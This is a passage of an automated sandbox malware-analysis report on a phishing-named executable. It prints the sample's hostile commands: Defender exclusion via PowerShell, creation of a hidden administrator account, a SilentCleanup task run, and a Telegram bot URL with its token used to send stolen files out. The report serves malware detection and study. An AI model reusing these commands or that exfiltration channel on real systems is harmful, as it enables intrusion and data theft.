                      Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/
                      Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: #NEW ORDER FOR JANUARY 2022.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF45394B2u002dD558u002d4194u002dB6CCu002dFB5B9687D7DAu007d/u0039118B742u002d0D2Fu002d474Du002dAB7Bu002d6EF15BBBF32F.csLarge array initialization: .cctor: array initializer size 12088
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDEJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_058144F00_2_058144F0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581E3D80_2_0581E3D8
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_058175890_2_05817589
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_058175980_2_05817598
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05816E000_2_05816E00
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_081139E00_2_081139E0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0811C4780_2_0811C478
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_081139D40_2_081139D4
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08113B2C0_2_08113B2C
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0811AB580_2_0811AB58
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08113C0B0_2_08113C0B
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08112CA00_2_08112CA0
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08112CE80_2_08112CE8
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08110E900_2_08110E90
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_08110E800_2_08110E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_0188486031_2_01884860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_0188477031_2_01884770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 31_2_0188DA0031_2_0188DA00
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F016C32_2_053F016C
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F50C032_2_053F50C0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F26E032_2_053F26E0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F5D0832_2_053F5D08
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F04BF32_2_053F04BF
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F50B132_2_053F50B1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F5CF832_2_053F5CF8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F04C832_2_053F04C8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F0F3032_2_053F0F30
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E827432_2_078E8274
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EEE1032_2_078EEE10
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF91832_2_078EF918
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E565832_2_078E5658
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078ED4D832_2_078ED4D8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E826832_2_078E8268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EE26832_2_078EE268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EE27832_2_078EE278
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E71D032_2_078E71D0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078E903032_2_078E9030
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EEDD832_2_078EEDD8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF8E032_2_078EF8E0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF80832_2_078EF808
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A156836_2_057A1568
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A312836_2_057A3128
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A570036_2_057A5700
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A078736_2_057A0787
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A01A836_2_057A01A8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A019936_2_057A0199
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A634836_2_057A6348
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A633836_2_057A6338
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0F0036_2_057A0F00
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A56F036_2_057A56F0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_057A0EC736_2_057A0EC7
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EAF036_2_0878EAF0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878FA9036_2_0878FA90
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878827436_2_08788274
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878D4D836_2_0878D4D8
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878F9E336_2_0878F9E3
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878FA5F36_2_0878FA5F
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EAE036_2_0878EAE0
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878903036_2_08789030
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878826836_2_08788268
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878565836_2_08785658
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013A486037_2_013A4860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013A477037_2_013A4770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_013ADA0037_2_013ADA00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E6C6837_2_058E6C68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E753837_2_058E7538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E94F837_2_058E94F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E256137_2_058E2561
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E267037_2_058E2670
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719160313.0000000000EBA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.Language.Intellisense.dllT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.719405918.00000000012F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730697748.00000000036E3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQfpw Hvc.exe2 vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: get_OriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: backupOfOriginalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: originalFileName vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameComSvcConfig.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_regbrowsers.exeT vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs #NEW ORDER FOR JANUARY 2022.exe
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: #NEW ORDER FOR JANUARY 2022.exeReversingLabs: Detection: 18%
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile read: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeJump to behavior
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /addJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /addJump to behavior
